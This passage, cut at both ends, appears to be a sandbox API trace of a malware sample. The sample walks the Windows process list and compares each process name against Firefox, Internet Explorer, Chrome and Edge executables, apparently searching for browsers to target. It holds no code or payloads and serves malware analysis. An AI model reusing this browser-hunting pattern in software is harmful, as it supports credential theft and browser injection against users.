(lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0227.256] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0227.257] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0227.257] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0227.257] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0227.257] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0227.257] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0227.257] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0227.257] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0227.257] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0227.257] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0227.257] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0227.258] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0227.258] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0227.258] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0227.258] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0227.258] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0227.258] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0227.258] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0227.258] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0227.258] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0227.258] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0227.259] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0227.259] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0227.259] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0227.259] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0227.259] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0227.260] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0227.260] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0227.260] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0227.260] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0227.260] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0227.260] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0227.260] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0227.260] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0227.260] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0227.260] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0227.261] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0227.261] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0227.261] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0227.261] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0227.261] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0227.261] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0227.261] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0227.261] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0227.261] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0227.261] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0227.262] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0227.262] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0227.262] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0227.262] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0227.262] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0227.262] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0227.262] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0227.262] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0227.263] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0227.263] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0227.263] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0227.263] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0227.263] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0227.263] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0227.263] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0227.264] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0227.264] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0227.264] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0227.264] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0227.264] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0227.264] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0227.264] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0227.264] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0227.264] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0227.264] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0227.265] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0227.265] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0227.265] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0227.265] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0227.265] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0227.265] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0227.265] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0227.265] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0227.265] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0227.265] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0227.266] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0227.266] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0227.266] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0227.266] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0227.266] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0227.266] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0227.266] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0227.266] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0227.266] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0227.266] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0227.267] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0227.267] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0227.267] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0227.267] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0227.267] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0227.268] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0227.268] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0227.268] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0227.268] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0227.268] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0227.268] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0227.268] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0227.268] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0227.268] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0227.268] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0227.269] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0227.269] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0227.269] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0227.269] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0227.269] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0227.269] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0227.269] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0227.269] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0227.269] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0227.269] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0227.270] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0227.270] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0227.270] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0227.270] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0227.270] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0227.271] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0227.271] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0227.271] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0227.271] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0227.271] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0227.271] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0227.271] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0227.271] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0227.271] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0227.271] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0227.272] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0227.272] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0227.272] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0227.272] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0227.272] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0227.273] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0227.273] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0227.273] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0227.273] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0227.273] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0227.274] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0227.274] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0227.274] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0227.274] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0227.274] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0227.274] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0227.274] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0227.274] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0227.274] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0227.274] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0227.275] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0227.275] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0227.275] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0227.275] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0227.275] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0227.276] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0227.276] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0227.276] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0227.276] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0227.276] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0227.276] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0227.276] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0227.277] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0227.277] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0227.277] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0227.277] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0227.277] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0227.277] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0227.277] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0227.277] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0227.278] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0227.278] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0227.278] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0227.278] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0227.278] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0227.279] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0227.279] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0227.279] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0227.279] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0227.279] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0227.279] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0227.279] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0227.279] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0227.279] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0227.279] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0227.280] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0227.280] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0227.280] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0227.280] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0227.280] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0227.281] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0227.281] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0227.281] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0227.281] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0227.281] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0227.281] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0227.282] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0227.282] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0227.282] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0227.282] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0227.282] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0227.282] lstrcmpiA (lpString1="sensors-democrat.exe", 